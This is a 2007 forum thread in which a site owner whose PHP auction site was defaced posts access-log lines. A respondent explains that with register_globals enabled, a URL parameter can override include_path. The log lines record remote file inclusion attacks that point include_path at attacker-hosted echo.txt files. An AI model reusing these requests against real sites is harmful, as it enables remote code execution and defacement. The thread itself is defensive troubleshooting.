|
|
Posted by Charles Crume on 10/16/07 02:36
Hi Jerry;
Thanks!!!
I am using an auction software package the *requires* register_globals to be
enabled. I took a look at my PHP.INI file and saw where I had changed this
setting years ago (had put some comments as to what, why, and when the
change was made in the file).
I have turned register_globals off (of course the auction software no longer
works) until I figure out what to do.
Thanks again for your help!
Charles...
"Jerry Stuckle" <jstucklex@attglobal.net> wrote in message
news:D7-dnQ0RJ6npTY_anZ2dnUVZ_gOdnZ2d@comcast.com...
> Charles Crume wrote:
>> Hello Everyone;
>>
>> My site was hacked the other day -- someone was able to rename my
>> index.shtml file and put their own index.html file on my server. Not sure
>> how it was done, but looking through the log file, I found a lots and
>> lots of entries where an "include_path" parameter was included in the URL
>> of the PHP page, as shown below:
>>
>> 69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
>> /auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
>> HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
>>
>> 69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
>> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
>> HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
>>
>> 69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
>> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
>> HTTP/1.0" 200 75 "-" "Mozilla/5.0"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
>> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
>> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1"
>> 404 310 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
>> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
>> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1"
>> 404 310 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
>> /auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
>> /includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
>> /auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
>>
>> I know how "include_path" works when *in* the PHP file, but I'm not sure
>> what the effect of including it in the URL. A number of entries show a
>> code 404 as the culprits are obviously phising for pages, but requests
>> with return code 200 are showing a large number of bytes transferred --
>> far larger than the PHP page itself.
>>
>> Can someone explain what adding "include_path" to a URL does?
>>
>> Is there something I need to check on my server of how I've got Apache
>> configured?
>>
>> TIA.
>>
>> Charles...
>>
>>
>>
>
> The include_path itself in the url is just a variable. It's what you do
> with it that's important. For instance, if you have register_globals
> enabled, the include_path in the URL may override the system include_path.
>
> Or, depending on what else you do in your code. This is a big reason why
> it's good to use $_POST instead of $_REQUEST if you're posting a form to a
> page - $_POST will ignore any $_GET parameters.
>
> And just another reason to *ALWAYS* validate data coming from the user.
>
> --
> ==================
> Remove the "x" from my email address
> Jerry Stuckle
> JDS Computer Training Corp.
> jstucklex@attglobal.net
> ==================
>
Navigation:
[Reply to this message]
|